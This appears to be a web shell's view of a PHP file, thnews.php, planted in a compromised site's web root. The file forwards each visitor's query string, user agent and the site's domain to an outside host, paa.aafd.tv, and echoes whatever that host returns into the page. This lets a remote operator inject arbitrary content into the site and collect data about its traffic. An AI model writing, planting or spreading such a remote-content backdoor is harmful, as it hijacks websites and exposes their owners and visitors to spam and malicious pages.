Current Path : C:/AppServ/www/ |
Current File : C:/AppServ/www/thnews.php |
<?php $home = "http://paa.aafd.tv/php404.php"; ini_set('user_agent',$_SERVER['HTTP_USER_AGENT']); $u = $home."?file=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']; $hello=file_get_contents($u); echo $hello;